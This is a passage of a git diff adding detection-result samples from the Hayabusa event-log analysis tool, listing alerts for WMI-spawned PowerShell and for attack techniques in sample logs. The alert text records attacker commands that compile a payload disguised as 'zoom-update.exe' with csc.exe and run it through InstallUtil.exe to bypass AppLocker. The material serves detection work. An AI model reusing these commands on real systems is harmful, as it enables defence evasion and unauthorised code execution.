Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx \ No newline at end of file diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx new file mode 100644 index 00000000..96bbd972 Binary files /dev/null and b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx differ